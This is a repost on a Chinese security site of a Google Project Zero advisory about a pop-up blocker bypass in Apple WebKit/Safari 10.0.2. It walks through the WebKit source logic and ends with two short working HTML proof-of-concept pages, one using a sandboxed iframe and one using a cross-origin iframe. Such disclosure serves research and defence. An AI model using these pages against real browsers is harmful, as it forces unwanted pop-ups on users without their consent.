首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass 来源：Google Security Research 作者：Google 发布时间：2017-02-27   <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1050   The second argument of window.open is a name for the new window. If there's a frame that has same name, it will try to load the URL in that. If not, it just tries to create a new window and pop-up. But without the user's click event, its attempt will fail.   Here's some snippets.   RefPtr<DOMWindow> DOMWindow::open(const String& urlString, const AtomicString& frameName, const String& windowFeaturesString,     DOMWindow& activeWindow, DOMWindow& firstWindow) {     ...     ---------------- (1) -----------------------     if (!firstWindow.allowPopUp()) { <<---- checks there's the user's click event.         // Because FrameTree::find() returns true for empty strings, we must check for empty frame names.         // Otherwise, illegitimate window.open() calls with no name will pass right through the popup blocker.         if (frameName.isEmpty() || !m_frame->tree().find(frameName))             return nullptr;     }     --------------------------------------------     ...     RefPtr<Frame> result = createWindow(urlString, frameName, parseWindowFeatures(windowFeaturesString), activeWindow, *firstFrame, *m_frame);     return result ? result->document()->domWindow() : nullptr; }     RefPtr<Frame> DOMWindow::createWindow(const String& urlString, const AtomicString& frameName, const WindowFeatures& windowFeatures, DOMWindow& activeWindow, Frame& firstFrame, Frame& openerFrame, std::function<void (DOMWindow&)> prepareDialogFunction) {     ...     RefPtr<Frame> newFrame = WebCore::createWindow(*activeFrame, openerFrame, frameRequest, windowFeatures, created);     if (!newFrame)         return nullptr;       ... }   RefPtr<Frame> createWindow(Frame& openerFrame, Frame& lookupFrame, const FrameLoadRequest& request, const WindowFeatures& features, bool& created) {     ASSERT(!features.dialog || request.frameName().isEmpty());       created = false;       ---------------- (2) -----------------------     if (!request.frameName().isEmpty() && request.frameName() != "_blank") {         if (RefPtr<Frame> frame = lookupFrame.loader().findFrameForNavigation(request.frameName(), openerFrame.document())) {             if (request.frameName() != "_self") {                 if (Page* page = frame->page())                     page->chrome().focus();             }             return frame;         }     }     --------------------------------------------       <<<<<----------- failed to find the frame, creates a new one.     ... }   The logic of the code (1) depends on the assumption that if |m_frame->tree().find(frameName)| succeeds, |lookupFrame.loader().findFrameForNavigation| at (2) will also succeed. If we could make |m_frame->tree().find(frameName)| succeed but |lookupFrame.loader().findFrameForNavigation| fail, a new window will be created and popped up without the user's click event.       Let's look into |findFrameForNavigation|.   Frame* FrameLoader::findFrameForNavigation(const AtomicString& name, Document* activeDocument) {     Frame* frame = m_frame.tree().find(name);       // FIXME: Eventually all callers should supply the actual activeDocument so we can call canNavigate with the right document.     if (!activeDocument)         activeDocument = m_frame.document();       if (!activeDocument->canNavigate(frame))         return nullptr;       return frame; }   bool Document::canNavigate(Frame* targetFrame) {     ...     if (isSandboxed(SandboxNavigation)) { <<<--------------- (1)         if (targetFrame->tree().isDescendantOf(m_frame))             return true;           const char* reason = "The frame attempting navigation is sandboxed, and is therefore disallowed from navigating its ancestors.";         if (isSandboxed(SandboxTopNavigation) && targetFrame == &m_frame->tree().top())             reason = "The frame attempting navigation of the top-level window is sandboxed, but the 'allow-top-navigation' flag is not set.";           printNavigationErrorMessage(targetFrame, url(), reason);         return false;     }       ...       if (canAccessAncestor(securityOrigin(), targetFrame)) <<<------------------- (2)         return true;       ...       return false; }   There are two points to make |Document::canNavigate| return false.   (1). Using a sandboxed iframe. <body> <iframe name="one"></iframe> <iframe id="two" sandbox="allow-scripts allow-same-origin allow-popups"></iframe>   <script> function main() {     two.eval('open("https://abc.xyz", "one");'); }   main() </script> </body>   (2). Using a cross-origin iframe. -->   <body> <iframe name="one"></iframe>   <script> function main() {     document.body.appendChild(document.createElement("iframe")).contentDocument.location =         "data:text/html,<script>open('https://abc.xyz', 'one')</scri" + "pt>"; }   main() </script> </body>   <!-- Tested on Safari 10.0.2 (12602.3.12.0.1). -->   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apple WebKit 10.0.2 - 'FrameLo ·Apple WebKit 10.0.2 - 'Frame:: ·macOS HelpViewer 10.12.1 - XSS ·Microsoft Edge and Internet Ex ·Microsoft Edge / Internet Expl ·Linux Kernel 4.4.0 (Ubuntu) - ·Disk Savvy Enterprise 9.4.18 - ·Linux Kernel 4.4.0 (Ubuntu) - ·Google Chrome - 'layout' Out-o ·Trend Micro InterScan Messagin ·EasyCom For PHP 4.0.0 - Denial ·MVPower DVR Shell Unauthentica   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved